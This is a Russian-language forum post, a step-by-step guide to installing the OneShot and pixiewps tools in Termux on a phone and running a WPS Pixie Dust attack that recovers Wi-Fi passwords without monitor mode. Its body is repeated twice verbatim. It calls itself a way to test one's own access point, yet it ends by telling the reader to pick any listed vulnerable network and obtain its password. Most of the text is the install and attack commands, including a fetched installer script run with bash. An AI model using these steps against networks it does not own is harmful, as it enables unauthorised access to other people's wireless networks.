- Автор темы
- #1
OneShot performs Pixie Dust attack without having to switch to monitor mode.
Или же, как протестировать свою точку доступа без режима монитора.
ПРЕДИСЛОВИЕ:
Это возможно будет полезно для тех, кто не может перевести свой адаптер в режим монитора.
На GitHub можно ознакомится с установкой на другую ОС, в моем случае я буду устанавливать на телефон(Termux).
УСТАНОВКА:
Используя установщик:
pkg install -y wget
wget https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh
bash installer.sh
Вручную:
Устанавливаем библиотеки:
pkg install root-repo
pkg install wget build-essential wpa-supplicant tsu python iw
Собираем Pixiewps:
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make && make install
Скачиваем OneShot:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
(Необязательно) получение списка уязвимых для pixie dust устройств для выделения в результатах сканирования:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Запуск:
sudo python oneshot.py -i wlan0 --iface-down -K
Дальше будет виден список уязвимых сетей, все интуитивно понятно, дальше выбираешь цифру сети(они пронумерованы), и если сеть уязвима - получаем пароль.
(источник: https://github.com/drygdryg/OneShot)
Или же, как протестировать свою точку доступа без режима монитора.
ПРЕДИСЛОВИЕ:
Это возможно будет полезно для тех, кто не может перевести свой адаптер в режим монитора.
На GitHub можно ознакомится с установкой на другую ОС, в моем случае я буду устанавливать на телефон(Termux).
УСТАНОВКА:
Используя установщик:
pkg install -y wget
wget https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh
bash installer.sh
Вручную:
Устанавливаем библиотеки:
pkg install root-repo
pkg install wget build-essential wpa-supplicant tsu python iw
Собираем Pixiewps:
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make && make install
Скачиваем OneShot:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
(Необязательно) получение списка уязвимых для pixie dust устройств для выделения в результатах сканирования:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Запуск:
sudo python oneshot.py -i wlan0 --iface-down -K
Дальше будет виден список уязвимых сетей, все интуитивно понятно, дальше выбираешь цифру сети(они пронумерованы), и если сеть уязвима - получаем пароль.
(источник: https://github.com/drygdryg/OneShot)